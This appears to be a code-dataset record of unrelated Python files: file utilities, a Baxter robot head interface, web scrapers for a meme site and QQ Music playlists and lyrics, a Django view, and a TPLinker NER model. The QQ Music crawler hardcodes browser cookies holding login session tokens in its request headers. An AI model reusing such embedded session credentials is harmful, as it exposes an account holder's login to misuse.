file_string = (re.sub(pattern, subst, file_string))
# Write contents to file.
# Using mode 'w' truncates the file.
file_handle = open(filename, 'w')
file_handle.write(file_string)
file_handle.close()
@staticmethod
def replace_str_in_file(match_str_regex,
new_str,
target_path='.',
target_filename='*',
explore_depth_max=3):
'''
@param match_str_regex: File pattern to match. You can use regular
expression.
@param new_str: String to be used.
@param target_path: Path under which target file(s) will be searched
at. Full or relative path.
@param target_filename: Name of the file(s) to be manipulated.
@param explore_depth_max: Depth to explore. 0 for infinity.
'''
# Find all files in sub-folders.
files_found = Util.find_all_files(
target_path, target_filename, depth_max=explore_depth_max)
for f in files_found:
print('Path of the file to be replaced: {}'.format(f))
# replace(f, "<version>.*</version>", "<version>0.8.2</version>")
try:
Util.replace(f, match_str_regex, new_str)
except IOError as e:
print(e)
# Testing regex
# if re.match("<version>.*</version>", "<version>0.7.2</version>"):
# print(11)
# else:
# print(22)
@staticmethod
def common_list(list_a, list_b):
'''
Originally hinted at http://stackoverflow.com/questions/20050913/python-unittests-assertdictcontainssubset-recommended-alternative
@type list_a: [str]
@type list_b: [str]
Returns a list of common values among the two passed lists.
'''
return [k for k in list_a.keys() if k in list_b.keys()]
@staticmethod
def mv_ext(source, dest):
'''
Extension to Linux mv command.
@type source: str
@type dest: str
@return: destination path
'''
dest_name = dest + "_" + datetime.datetime.fromtimestamp(time.time()).strftime('%Y%m%d%H%M%S')
print("mv dest name: {}".format(dest_name))
res = subprocess.call(["mv", source, dest_name])
        if res != 0:
            raise subprocess.CalledProcessError(
                res, "mv {} {}".format(source, dest_name))
return dest_name
``` |
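A short usage sketch of the helpers above. The module path, file patterns and replacement strings are placeholders chosen for illustration:
```python
# Hypothetical usage of Util (module path assumed from the src/ layout).
from hut_10sqft.util import Util

xml_files = Util.find_all_files(path='.', filename_pattern='*.xml', depth_max=2)
print(xml_files)

# Bump a version tag in every package.xml under the current directory.
Util.replace_str_in_file(r"<version>.*</version>", "<version>0.8.2</version>",
                         target_path='.', target_filename='package.xml')
```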
{
"source": "130s/baxter_interface",
"score": 2
} |
#### File: src/baxter_interface/head.py
```python
from copy import deepcopy
from math import fabs
import rospy
from std_msgs.msg import (
Bool
)
import baxter_dataflow
from baxter_core_msgs.msg import (
HeadPanCommand,
HeadState,
)
from baxter_interface import settings
class Head(object):
"""
Interface class for the head on the Baxter Robot.
Used to control the head pan angle and to enable/disable the head nod
action.
"""
def __init__(self):
"""
Constructor.
"""
self._state = dict()
self._pub_pan = rospy.Publisher(
'/robot/head/command_head_pan',
HeadPanCommand,
queue_size=10)
self._pub_nod = rospy.Publisher(
'/robot/head/command_head_nod',
Bool,
queue_size=10)
state_topic = '/robot/head/head_state'
self._sub_state = rospy.Subscriber(
state_topic,
HeadState,
self._on_head_state)
baxter_dataflow.wait_for(
lambda: len(self._state) != 0,
timeout=5.0,
timeout_msg=("Failed to get current head state from %s" %
(state_topic,)),
)
def _on_head_state(self, msg):
self._state['pan'] = msg.pan
self._state['panning'] = msg.isTurning
self._state['nodding'] = msg.isNodding
def pan(self):
"""
Get the current pan angle of the head.
@rtype: float
@return: current angle in radians
"""
return self._state['pan']
def nodding(self):
"""
Check if the head is currently nodding.
@rtype: bool
@return: True if the head is currently nodding, False otherwise.
"""
return self._state['nodding']
def panning(self):
"""
Check if the head is currently panning.
@rtype: bool
@return: True if the head is currently panning, False otherwise.
"""
return self._state['panning']
def set_pan(self, angle, speed=1.0, timeout=10.0, scale_speed=False):
"""
Pan at the given speed to the desired angle.
@type angle: float
@param angle: Desired pan angle in radians.
@type speed: int
@param speed: Desired speed to pan at, range is 0-1.0 [1.0]
@type timeout: float
@param timeout: Seconds to wait for the head to pan to the
specified angle. If 0, just command once and
return. [10]
@param scale_speed: Scale speed to pan at by a factor of 100,
to use legacy range between 0-100 [100]
"""
if scale_speed:
            cmd_speed = speed / 100.0
else:
cmd_speed = speed
if (cmd_speed < HeadPanCommand.MIN_SPEED_RATIO or
cmd_speed > HeadPanCommand.MAX_SPEED_RATIO):
rospy.logerr(("Commanded Speed, ({0}), outside of valid range"
" [{1}, {2}]").format(cmd_speed,
HeadPanCommand.MIN_SPEED_RATIO,
HeadPanCommand.MAX_SPEED_RATIO))
msg = HeadPanCommand(angle, cmd_speed, True)
self._pub_pan.publish(msg)
if not timeout == 0:
baxter_dataflow.wait_for(
lambda: (abs(self.pan() - angle) <=
settings.HEAD_PAN_ANGLE_TOLERANCE),
timeout=timeout,
rate=100,
timeout_msg="Failed to move head to pan command %f" % angle,
body=lambda: self._pub_pan.publish(msg)
)
def command_nod(self, timeout=5.0):
"""
Command the head to nod once.
@type timeout: float
@param timeout: Seconds to wait for the head to nod.
If 0, just command once and return. [0]
"""
self._pub_nod.publish(True)
if not timeout == 0:
# Wait for nod to initiate
baxter_dataflow.wait_for(
test=self.nodding,
timeout=timeout,
rate=100,
timeout_msg="Failed to initiate head nod command",
body=lambda: self._pub_nod.publish(True)
)
# Wait for nod to complete
baxter_dataflow.wait_for(
test=lambda: not self.nodding(),
timeout=timeout,
rate=100,
timeout_msg="Failed to complete head nod command",
body=lambda: self._pub_nod.publish(False)
)
``` |
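A minimal usage sketch, assuming a running ROS master and a reachable Baxter robot; the node name and pan angle are arbitrary:
```python
# Hypothetical usage: requires a ROS master and a Baxter robot to be available.
import rospy
import baxter_interface

rospy.init_node("head_demo")
head = baxter_interface.Head()
head.command_nod()            # nod once
head.set_pan(0.0, speed=0.8)  # pan back to centre
print(head.pan())
```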
{
"source": "1312246931/CIAIC_2020_TC",
"score": 3
} |
#### File: 2020.08.08/表情包提取/doutula_simple.py
```python
import requests
from bs4 import BeautifulSoup
import xlwt
import os
import re
import logging
def init_logger(log_file=None):
    #Logging configuration
'''
    :param log_file: path where the log file will be saved
    :return: the initialised logger
'''
log_format = logging.Formatter("[%(asctime)s %(levelname)s] %(message)s")
logger = logging.getLogger()
logger.setLevel(logging.INFO)
console_handler = logging.StreamHandler()
console_handler.setFormatter(log_format)
logger.handlers = [console_handler]
if log_file and log_file != '':
file_handler = logging.FileHandler(log_file)
file_handler.setFormatter(log_format)
logger.addHandler(file_handler)
return logger
def request_doutula(url):
    #Check whether the site responds normally
'''
    :param url: page URL
:return: None
'''
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0'}
    #Identifies the browser type/version, operating system and engine to the site being visited
try:
response = requests.get(url,headers=headers)
if response.status_code == 200:
return response.text
            #If the site responds normally the status code is 200 and the text is returned, otherwise None
except requests.RequestException:
return None
def save_to_excel_and_download(sheet, soup, headers):
    #Extract the needed fields from the page source and save them to the Excel sheet
'''
    :param sheet: worksheet to write into
    :param soup: page content parsed by BeautifulSoup
    :param headers: request headers identifying the browser, OS and engine
:return: None
'''
list = soup.find(class_='col-sm-9 center-wrap').find_all(class_='list-group-item random_list tg-article')
for item in list:
list_1 = item.find(class_='random_article').find_all(class_='col-xs-6 col-sm-3')
for item_1 in list_1:
item_name = item.find(class_='random_title').text
item_name = re.sub("[0-9-]", "", item_name)
item_time = item.find(class_='random_title').find(class_='date').string
item_img = item_1.find('img').get('data-original')
if item_img is None:
logger.error('None')
                #If item_img is missing, log None
else:
logger.info('爬取表情包:' + item_name + '|'+ item_img)
global n
sheet.write(n, 0, item_name)
sheet.write(n, 1, item_time)
sheet.write(n, 2, item_img)
download_pic(item_img, headers, item_name)
n=n+1
def download_pic(item_img, headers, item_name):
    #Download the image extracted from the page
'''
    :param item_img: URL of the extracted meme image
    :param headers: request headers identifying the browser, OS and engine
    :param item_name: name of the meme set
:return: None
'''
response = requests.get(item_img, headers=headers)
data = response.content
os.getcwd()
os.makedirs(str(item_name), exist_ok=True)
    #Create a directory for this set
file_path = "/" + str(item_name) + '/' + str(n) + ".png"
with open(os.getcwd() + file_path, "wb") as f:
f.write(data)
logger.info("爬取图片+1")
logger = init_logger(log_file=os.path.join('C:/Users/LSP/Desktop/python学习笔记/表情包提取','extract_meme.log'))
def main(page, sheet, book):
    #Main routine
'''
    :param page: page number on the site
    :param sheet: worksheet to write into
    :param book: Excel workbook
:return: None
'''
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0'}
url = 'http://www.doutula.com/article/list/?page='+str(page)
##################################
html = request_doutula(url)
soup = BeautifulSoup(html, 'lxml')
    #Parse the page with BeautifulSoup
save_to_excel_and_download(sheet, soup, headers)
book.save(u'表情包列表.xls')
def book_initialization():
    #The Excel sheet records information that can be extracted from the page source: the meme set name, its publish time and each image URL
'''
    :return: worksheet, Excel workbook
'''
book = xlwt.Workbook(encoding='utf-8', style_compression=0)
sheet = book.add_sheet('斗图啦套图', cell_overwrite_ok=True)
sheet.write(0, 0, '名称')
sheet.write(0, 1, '时间')
sheet.write(0, 2, '图片')
return sheet, book
if __name__ == '__main__':
n = 1
sheet, book = book_initialization()
for i in range(1, 2):
        #Number of pages to crawl
main(i, sheet, book)
```
#### File: 李盛强/spider-weread/utils.py
```python
import logging
def init_logger(log_file=None):
"""
    Initialise a logger
    Ranking of level:CRITICAL(50) == FATAL(50) > ERROR(40) > WARNING(30) == WARN(30) > INFO(20) > DEBUG(10) > NOTSET(0)
    :param log_file: path of the log file
:return: logger
"""
log_format = logging.Formatter("[%(asctime)s %(levelname)s] %(message)s")
logger = logging.getLogger()
    logger.setLevel(logging.INFO)  # output level is INFO
console_handler = logging.StreamHandler()
console_handler.setFormatter(log_format)
logger.handlers = [console_handler]
if log_file and log_file != '':
file_handler = logging.FileHandler(log_file)
file_handler.setFormatter(log_format)
logger.addHandler(file_handler)
return logger
```
#### File: django_project/app003/views.py
```python
from django.shortcuts import render
from .douban_movie import Douban_Inquire, init_logger
# Create your views here.
def fun_method01(request):
return render(request,'app003/html04.html')
logger=init_logger(log_file='./日志.log')
def douban(request):
web_douban = Douban_Inquire()
infor = web_douban.get_web_douban()
return render(request, 'app003/html04.html',{'douban_movie_info': infor})
``` |
{
"source": "131250208/Doraemon",
"score": 2
} |
#### File: Doraemon/Crawlers/qq_music_crawler_by_album.py
```python
import html
import json
import re
import os
from urllib import parse
from Doraemon.Requests import requests_dora
from tqdm import tqdm
def get_album_list(sin, ein):
url = "https://c.y.qq.com/splcloud/fcgi-bin/fcg_get_diss_by_tag.fcg"
header = {
"user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36",
"cookie": "RK=7dNm4/X + Yj; tvfe_boss_uuid=bf00ee54e9081ab4; pgv_pvi=8772238336; pac_uid=1_857193777; pgv_pvid=6457341280; o_cookie=80; ptcz=c761e59c8c8d6bd5198866d02a5cb7313af1af468006c455d6c2b5d26201d42e; pgv_si=s10759168; _qpsvr_localtk=0.08285763449905015; ptisp=ctc; luin=o0857193777; lskey=<KEY>; pt2gguin=o0857193777; uin=o0857193777; skey=@Kydi7w0EI; p_uin=o0857193777; p_skey=HjsE9sEjznJfXk*<KEY>_; pt4_token=c-p6sv3JEboA51cSQ3ABqxM8O80Jct3jYYkgy-aEQuE_; p_luin=o0857193777; p_lskey=000400008f9c296cd10c03a5173d22a184aad124d791568e90e4198beb8ad699a4d02fbfc059f71ab3d8758c; ts_last=y.qq.com/portal/playlist.html; ts_refer=ui.ptlogin2.qq.com/cgi-bin/login; ts_uid=3392060960",
"referer": "https://y.qq.com/portal/playlist.html"
}
paramter = {
"g_tk": "1089387893",
"jsonpCallback": "getPlaylist",
"loginUin": "0",
"hostUin": "0",
"format": "jsonp",
"inCharset": "utf8",
"outCharset": "utf-8",
"notice": "0",
"platform": "yqq",
"needNewCode": "0",
"categoryId": "10000000",
"sortId": "5",
"sin": sin, # 开始结点
"ein": ein # 结束结点,用于翻页
}
html_text = requests_dora.try_best_2_get(url=url, params=paramter, headers=header).text
res = json.loads(html_text.lstrip("getPlaylist(").rstrip(")"))["data"]["list"]
album_list = []
for t_item in res:
album = {}
        ILLEGAL_CHARACTERS_RE = re.compile(r"[\000-\010]|[\013-\014]|[\016-\037]")  # used to strip illegal control characters
album["createtime"] = t_item["createtime"]
album["creator_qq"] = t_item["creator"]["qq"]
album["creator_name"] = t_item["creator"]["name"]
album["creator_name"] = ILLEGAL_CHARACTERS_RE.sub(r"", album["creator_name"])
album["creator_isVip"] = t_item["creator"]["isVip"]
album["dissid"] = t_item["dissid"] #提取歌单id,用于后续提取歌曲id
album["dissname"] = t_item["dissname"] #歌单名称
album["dissname"] = ILLEGAL_CHARACTERS_RE.sub(r"", album["dissname"])
album["listennum"] = t_item["listennum"] #播放量
album_list.append(album)
return album_list
#Fetch the song ids of a playlist
def get_song_list(dissid):
url = "https://c.y.qq.com/qzone/fcg-bin/fcg_ucc_getcdinfo_byids_cp.fcg"
header = {
"user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36",
"cookie": "RK=7dNm4/X + Yj; tvfe_boss_uuid=bf00ee54e9081ab4; pgv_pvi=8772238336; pac_uid=1_857193777; pgv_pvid=6457341280; o_cookie=857193777; ptcz=c761e59c8c8d6bd5198866d02a5cb7313af1af468006c455d6c2b5d26201d42e; pgv_si=s10759168; _qpsvr_localtk=0.08285763449905015; ptisp=ctc; luin=o0857193777; lskey=<KEY>; pt2gguin=o0857193777; uin=o0857193777; skey=@Kydi7w0EI; p_uin=o0857193777; p_skey=HjsE9sEjznJfXk*9KFEeW4VZr6i3*tlXZ2nuzEw8kCg_; pt4_token=c-p6sv3JEboA51cSQ3ABqxM8O80Jct3jYYkgy-aEQuE_; p_luin=o0857193777; p_lskey=000400008f9c296cd10c03a5173d22a184aad124d791568e90e4198beb8ad699a4d02fbfc059f71ab3d8758c; ts_last=y.qq.com/portal/playlist.html; ts_refer=ui.ptlogin2.qq.com/cgi-bin/login; ts_uid=3392060960",
"referer": "https://y.qq.com/n/yqq/playlist/{}.html".format(dissid)
}
paramters = {
"type": "1",
"json": "1",
"utf8": "1",
"onlysong": "0",
"disstid": dissid,
"format": "jsonp",
"g_tk": "1089387893",
"jsonpCallback": "playlistinfoCallback",
"loginUin": "857193777",
"hostUin": "0",
"inCharset": "utf8",
"outCharset": "utf-8",
"notice": 0,
"platform": "yqq",
"needNewCode": 0
}
html_text = requests_dora.try_best_2_get(url=url, params=paramters, headers=header).text
cdlist = json.loads(html_text.lstrip("playlistinfoCallback(").rstrip(")"))["cdlist"]
if len(cdlist) >= 1:
cdlist = cdlist[0]
song_list = []
tags = ", ".join([i["name"] for i in cdlist["tags"]])
for item in cdlist["songlist"]:
song = {}
# if "size128" in item:
# song["size128"] = item["size128"]
if "songmid" in item:
song["songmid"] = item["songmid"]
else:
continue
if "songid" in item:
song["songid"] = item["songid"]
else:
continue
song["albumname"] = item["albumname"]
song["songname"] = item["songname"]
song["singer"] = ", ".join([i["name"] for i in item["singer"]])
song["tags"] = tags
song_list.append(song)
return song_list
def get_lyric(song):
songid = song["songid"]
songmid = song["songmid"]
url = "https://c.y.qq.com/lyric/fcgi-bin/fcg_query_lyric.fcg"
header = {
"user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36",
"referer": "https://y.qq.com/n/yqq/song/{}.html".format(songmid)
}
paramters = {
"nobase64": 1,
"musicid": songid,
"callback": "jsonp1",
"g_tk": "1134533366",
"jsonpCallback": "jsonp1",
"loginUin": "0",
"hostUin": "0",
"format": "jsonp",
"inCharset": "utf8",
"outCharset": "utf-8",
"notice": "0",
"platform": "yqq",
"needNewCode": "0"
}
html_text = requests_dora.try_best_2_get(url=url, params=paramters, headers=header).text
res = json.loads(html_text.lstrip("jsonp1(").rstrip(")"))
# if "lyric" in res:
# lyric = res["lyric"]
# # decode
# lyric = html.unescape(lyric)
# lyric = html.unescape(lyric)
# lyric = parse.unquote(lyric)
#
# it = re.finditer(r"\[(.*?)\](.+)", lyric)
# lyric_lines = []
# for match in it:
# time_pop_up = match.group(1)
# time_split = time_pop_up.split(".")
# ms = float("0.{}".format(time_split[1]))
# sec = time.strptime(time_split[0], "%M:%S").tm_sec
# line = match.group(2)
# line = line.strip()
# if re.search("[::]", line) or line == "" or line == "此歌曲为没有填词的纯音乐,请您欣赏":
# continue
# lyric_lines.append({
# "time": sec + ms,
# "line": line,
# })
#
# return lyric_lines[1:]
# else:
# return []
if "lyric" in res:
lyric = res["lyric"]
if "此歌曲为没有填词的纯音乐,请您欣赏" in lyric:
return {}, []
# decode
lyric = html.unescape(lyric)
lyric = html.unescape(lyric)
lyric = parse.unquote(lyric)
it = re.finditer(r"\[(\d+):(\d+.\d+)\](.+)", lyric)
lyric_lines = []
contributors_dict = {}
for match in it:
min = float(match.group(1))
try:
sec = float(match.group(2))
except ValueError:
sec = 0
line = match.group(3)
line = line.strip()
if line == "":
continue
se_contributors = re.search("(.*?)[::](.*)", line)
if se_contributors:
contributors_dict[se_contributors.group(1).strip()] = se_contributors.group(2).strip()
continue
lyric_lines.append({
"time": min * 60 + sec,
"line": line,
})
return contributors_dict, lyric_lines[1:]
else:
return {}, []
def get_detail(song):
songid = song["songid"]
songmid = song["songmid"]
url = "https://c.y.qq.com/v8/fcg-bin/fcg_play_single_song.fcg"
header = {
"user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36",
"referer": "https://y.qq.com/n/yqq/song/{}.html".format(songid)
}
paramters = {
"songmid": songmid,
"tpl": "yqq_song_detail",
"format": "jsonp",
"callback": "getOneSongInfoCallback",
"g_tk": "1134533366",
"jsonpCallback": "getOneSongInfoCallback",
"loginUin": "0",
"hostUin": "0",
"inCharset": "utf8",
"outCharset": "utf-8",
"notice": 0,
"platform": "yqq",
"needNewCode": 0
}
html_text = requests_dora.try_best_2_get(url=url, params=paramters, headers=header, verify=True).text
detail = json.loads(html_text.lstrip("getOneSongInfoCallback(").rstrip(")"))["data"]
song = {}
if len(detail) > 0:
detail = detail[0]
song["subtitle"] = detail["subtitle"]
song["title"] = detail["title"]
song["time_public"] = detail["time_public"]
try:
song["url"] = json.loads(html_text.lstrip("getOneSongInfoCallback(").rstrip(")"))["url"][str(songid)]
except:
song["url"] = ""
return song
if __name__ == "__main__":
save_path = "./qq_music_songs_by_album"
if not os.path.exists(save_path):
os.makedirs(save_path)
for sin in range(0, 7050, 30):
ein = sin + 29
album_list = get_album_list(sin, ein) # get 30 albums
for album in album_list:
dissname = album["dissname"]
song_list = get_song_list(album["dissid"])
chunk = []
for song in tqdm(song_list, desc = "getting songs in {}".format(dissname)):
contributors, lyric = get_lyric(song)
song["lyric"] = lyric
chunk.append(song)
            with open("{}/lyric_{}.json".format(save_path, dissname), "w", encoding = "utf-8") as f:
                json.dump(chunk, f, ensure_ascii = False)
``` |
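The script above strips the JSONP callback wrappers with `str.lstrip`/`str.rstrip`, which remove *characters* rather than literal prefixes; it only works because the JSON payload happens to start with `{` and end with `}`. A more robust approach is to pull the body out with a regular expression — a minimal sketch with a hypothetical `unwrap_jsonp` helper, not part of the original script:
```python
import json
import re

def unwrap_jsonp(text):
    # Grab everything between the first "(" and the last ")", regardless of the callback name.
    match = re.search(r"\((.*)\)\s*;?\s*$", text, re.S)
    if match is None:
        raise ValueError("response does not look like a JSONP payload")
    return json.loads(match.group(1))

# e.g. unwrap_jsonp('jsonp1({"lyric": "..."})') -> {'lyric': '...'}
```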
{
"source": "131250208/TPLinkerNER",
"score": 2
} |
#### File: yucheng_ner/mrc_tplinker_ner/mrc_tplinker_ner.py
```python
import re
from tqdm import tqdm
import torch
from IPython.core.debugger import set_trace
import copy
import torch
import torch.nn as nn
import json
from ner_common.components import HandshakingKernel
from torch.nn.parameter import Parameter
class HandshakingTaggingScheme:
def __init__(self, types, max_seq_len_t1, visual_field):
'''
max_seq_len_t1: max sequence length of text 1
        visual_field: how many tokens after the start token are taken into consideration
'''
super().__init__()
self.visual_field = visual_field
self.types = set(types)
# mapping shaking sequence and matrix
self.matrix_size = max_seq_len_t1
# e.g. [(0, 0), (0, 1), (0, 2), (1, 1), (1, 2), (2, 2)]
self.shaking_idx2matrix_idx = [(ind, end_ind) for ind in range(self.matrix_size) for end_ind in list(range(self.matrix_size))[ind:ind + visual_field]]
self.matrix_idx2shaking_idx = [[0 for i in range(self.matrix_size)] for j in range(self.matrix_size)]
for shaking_idx, matrix_idx in enumerate(self.shaking_idx2matrix_idx):
self.matrix_idx2shaking_idx[matrix_idx[0]][matrix_idx[1]] = shaking_idx
def get_spots(self, sample):
'''
type2spots: a dict mapping type to spots
spot: (start_pos, end_pos - 1), points in the shaking matrix
'''
type2spots = {t: [] for t in self.types}
for ent in sample["entity_list"]:
t = ent["type"]
spot = (ent["tok_span"][0], ent["tok_span"][1] - 1)
type2spots[t].append(spot) # term["tok_span"][1] - 1: span[1] is not included
return type2spots
def spots2shaking_tag4batch(self, spots_batch):
'''
convert spots to shaking tag
spots_batch:
[spots1, spots2, ....]
spots: [(start_pos, end_pos), ]
return: shaking tag
'''
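        # shaking_seq_len counts all (start, end) pairs with 0 <= end - start < visual_field,
        # i.e. matrix_size * visual_field - visual_field * (visual_field - 1) / 2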
shaking_seq_len = self.matrix_size * self.visual_field - self.visual_field * (self.visual_field - 1) // 2
# set_trace()
shaking_seq_tag = torch.zeros([len(spots_batch), shaking_seq_len]).long()
for batch_idx, spots in enumerate(spots_batch):
for sp in spots:
shaking_ind = self.matrix_idx2shaking_idx[sp[0]][sp[1]]
shaking_seq_tag[batch_idx][shaking_ind] = 1
return shaking_seq_tag
def get_spots_fr_shaking_tag(self, shaking_tag):
'''
shaking_tag: (shaking_seq_len, )
return matrix_spots: [(start_pos, end_pos), ]
'''
matrix_spots = []
for point in shaking_tag.nonzero():
shaking_idx = point[0].item()
matrix_points = self.shaking_idx2matrix_idx[shaking_idx]
spot = (matrix_points[0], matrix_points[1])
matrix_spots.append(spot)
return matrix_spots
def decode_ent(self, question, text, shaking_tag, tok2char_span, tok_offset = 0, char_offset = 0):
'''
shaking_tag: size = (shaking_seq_len, tag_size)
if text is a subtext of test data, tok_offset and char_offset must be set
'''
matrix_spots = self.get_spots_fr_shaking_tag(shaking_tag)
entities = []
entity_memory_set = set()
type_ = re.match("Find (.*?) in the text.*", question).group(1)
for sp in matrix_spots:
char_spans = tok2char_span[sp[0]:sp[1] + 1]
char_sp = [char_spans[0][0], char_spans[-1][1]]
ent = text[char_sp[0]:char_sp[1]]
ent_memory = "{}\u2E80{}\u2E80{}".format(ent, *sp)
if ent_memory not in entity_memory_set:
entities.append({
"text": ent,
"tok_span": [sp[0] + tok_offset, sp[1] + 1 + tok_offset],
"char_span": [char_sp[0] + char_offset, char_sp[1] + char_offset],
"type": type_,
})
entity_memory_set.add(ent_memory)
return entities
class DataMaker:
def __init__(self, handshaking_tagger, tokenizer):
super().__init__()
self.handshaking_tagger = handshaking_tagger
self.tokenizer = tokenizer
def get_indexed_data(self, data, max_seq_len, type2questions, data_type = "train"):
indexed_samples = []
for sample in tqdm(data, desc = "Generate indexed data"):
text = sample["text"]
# get spots
type2spots = None
if data_type != "test":
type2spots = self.handshaking_tagger.get_spots(sample)
for type_, questions in type2questions.items():
for question in questions:
# codes for bert input
question = "Find {} in the text, {}".format(type_, question)
text_n_question = "{}[SEP]{}".format(text, question)
codes = self.tokenizer.encode_plus(text_n_question,
return_offsets_mapping = True,
add_special_tokens = False,
max_length = max_seq_len,
truncation = True,
pad_to_max_length = True)
# get codes
input_ids = torch.tensor(codes["input_ids"]).long()
attention_mask = torch.tensor(codes["attention_mask"]).long()
token_type_ids = torch.tensor(codes["token_type_ids"]).long()
offset_map = codes["offset_mapping"]
# spots
matrix_spots = type2spots[type_]
sub_sample = copy.deepcopy(sample)
sub_sample["entity_list"] = [ent for ent in sample["entity_list"] if ent["type"] == type_]
sub_sample["question"] = question
sample_tp = (sub_sample,
input_ids,
attention_mask,
token_type_ids,
offset_map,
matrix_spots,
)
indexed_samples.append(sample_tp)
return indexed_samples
def generate_batch(self, batch_data, data_type = "train"):
sample_list = []
input_ids_list = []
attention_mask_list = []
token_type_ids_list = []
offset_map_list = []
matrix_spots_batch = []
for tp in batch_data:
sample_list.append(tp[0])
input_ids_list.append(tp[1])
attention_mask_list.append(tp[2])
token_type_ids_list.append(tp[3])
offset_map_list.append(tp[4])
if data_type != "test":
matrix_spots_batch.append(tp[5])
batch_input_ids = torch.stack(input_ids_list, dim = 0)
batch_attention_mask = torch.stack(attention_mask_list, dim = 0)
batch_token_type_ids = torch.stack(token_type_ids_list, dim = 0)
batch_shaking_tag = None
if data_type != "test":
batch_shaking_tag = self.handshaking_tagger.spots2shaking_tag4batch(matrix_spots_batch)
return sample_list, batch_input_ids, batch_attention_mask, batch_token_type_ids, offset_map_list, batch_shaking_tag
class MRCTPLinkerNER(nn.Module):
def __init__(self,
encoder,
fake_input,
shaking_type,
pooling_type,
visual_field):
super().__init__()
self.encoder = encoder
shaking_hidden_size = encoder.config.hidden_size
self.fc = nn.Linear(shaking_hidden_size, 2)
# handshaking kernel
self.handshaking_kernel = HandshakingKernel(visual_field, fake_input, shaking_type, pooling_type)
def forward(self, input_ids, attention_mask, token_type_ids, max_seq_len_t1):
'''
        max_seq_len_t1: max sequence length of text 1
'''
# input_ids, attention_mask, token_type_ids: (batch_size, seq_len)
# set_trace()
context_outputs = self.encoder(input_ids, attention_mask, token_type_ids)
# last_hidden_state: (batch_size, seq_len, hidden_size)
last_hidden_state = context_outputs[0]
# shaking_hiddens: (batch_size, shaking_seq_len, hidden_size)
# shaking_seq_len: max_seq_len_t1 * vf - sum(1, vf)
        shaking_hiddens = self.handshaking_kernel(last_hidden_state[:, :max_seq_len_t1, :]) # only consider text 1, ignoring the question part
# ent_shaking_outputs: (batch_size, shaking_seq_len, entity_type_num)
ent_shaking_outputs = self.fc(shaking_hiddens)
return ent_shaking_outputs
class Metrics:
def __init__(self, handshaking_tagger):
super().__init__()
self.handshaking_tagger = handshaking_tagger
def get_sample_accuracy(self, pred, truth):
'''
        Exact-match accuracy: the fraction of samples whose entire tag sequence is predicted correctly.
'''
# (batch_size, ..., seq_len) -> (batch_size, -1)
pred = pred.view(pred.size()[0], -1)
truth = truth.view(truth.size()[0], -1)
        # (batch_size, ), each element is the number of positions where pred and truth have the same tag
correct_tag_num = torch.sum(torch.eq(truth, pred).float(), dim = 1)
        # all tags along the seq dimension must be correct, so correct_tag_num must equal the seq length for the sample to count as correct
sample_acc_ = torch.eq(correct_tag_num, torch.ones_like(correct_tag_num) * truth.size()[-1]).float()
sample_acc = torch.mean(sample_acc_, axis=0)
return sample_acc
def get_ent_correct_pred_glod_num(self, gold_sample_list,
offset_map_list,
batch_pred_ent_shaking_seq_tag):
correct_num, pred_num, gold_num = 0, 0, 0
for ind in range(len(gold_sample_list)):
gold_sample = gold_sample_list[ind]
question = gold_sample["question"]
text = gold_sample["text"]
offset_map = offset_map_list[ind]
pred_ent_shaking_seq_tag = batch_pred_ent_shaking_seq_tag[ind]
pred_entities = self.handshaking_tagger.decode_ent(question, text, pred_ent_shaking_seq_tag, offset_map)
gold_entities = gold_sample["entity_list"]
pred_num += len(pred_entities)
gold_num += len(gold_entities)
memory_set = set()
for ent in gold_entities:
memory_set.add("{}\u2E80{}\u2E80{}".format(ent["tok_span"][0], ent["tok_span"][1], ent["type"]))
for ent in pred_entities:
hit = "{}\u2E80{}\u2E80{}".format(ent["tok_span"][0], ent["tok_span"][1], ent["type"])
if hit in memory_set:
correct_num += 1
return correct_num, pred_num, gold_num
def get_scores(self, correct_num, pred_num, gold_num):
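        # minimini is a tiny constant that avoids division by zero when pred_num or gold_num is 0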
minimini = 1e-10
precision = correct_num / (pred_num + minimini)
recall = correct_num / (gold_num + minimini)
f1 = 2 * precision * recall / (precision + recall + minimini)
return precision, recall, f1
```
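The handshaking scheme flattens the banded upper triangle of the (start, end) span matrix into a 1D sequence. Below is a small sanity-check sketch of the two lookup tables built in `HandshakingTaggingScheme.__init__`; the concrete sizes are made up for illustration and it assumes the module above is importable:
```python
# Three hypothetical entity types, a 5-token text, and a visual field of 3.
tagger = HandshakingTaggingScheme(types=["PER", "LOC", "ORG"],
                                  max_seq_len_t1=5, visual_field=3)

# Every shaking index corresponds to a (start, end) token pair with end - start < visual_field.
print(tagger.shaking_idx2matrix_idx)
# [(0, 0), (0, 1), (0, 2), (1, 1), (1, 2), (1, 3), (2, 2), (2, 3), (2, 4), (3, 3), (3, 4), (4, 4)]

# The reverse table maps a span back to its position in the flattened sequence.
shaking_idx = tagger.matrix_idx2shaking_idx[1][3]
assert tagger.shaking_idx2matrix_idx[shaking_idx] == (1, 3)
```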
#### File: yucheng_ner/ner_common/utils.py
```python
import re
from tqdm import tqdm
from IPython.core.debugger import set_trace
import copy
from transformers import BertTokenizerFast
import torch
class WordTokenizer:
def __init__(self, word2idx = None):
self.word2idx = word2idx
def tokenize(self, text):
return text.split(" ")
def text2word_indices(self, text, max_length = -1):
if not self.word2idx:
raise ValueError("if you invoke text2word_indices, self.word2idx should be set when initialize WordTokenizer")
word_ids = []
words = text.split(" ")
for w in words:
if w not in self.word2idx:
word_ids.append(self.word2idx['<UNK>'])
else:
word_ids.append(self.word2idx[w])
if len(word_ids) < max_length:
word_ids.extend([self.word2idx['<PAD>']] * (max_length - len(word_ids)))
if max_length != -1:
word_ids = torch.tensor(word_ids[:max_length]).long()
return word_ids
def get_word2char_span_map(self, text, max_length = -1):
words = self.tokenize(text)
word2char_span = []
char_num = 0
for wd in words:
word2char_span.append([char_num, char_num + len(wd)])
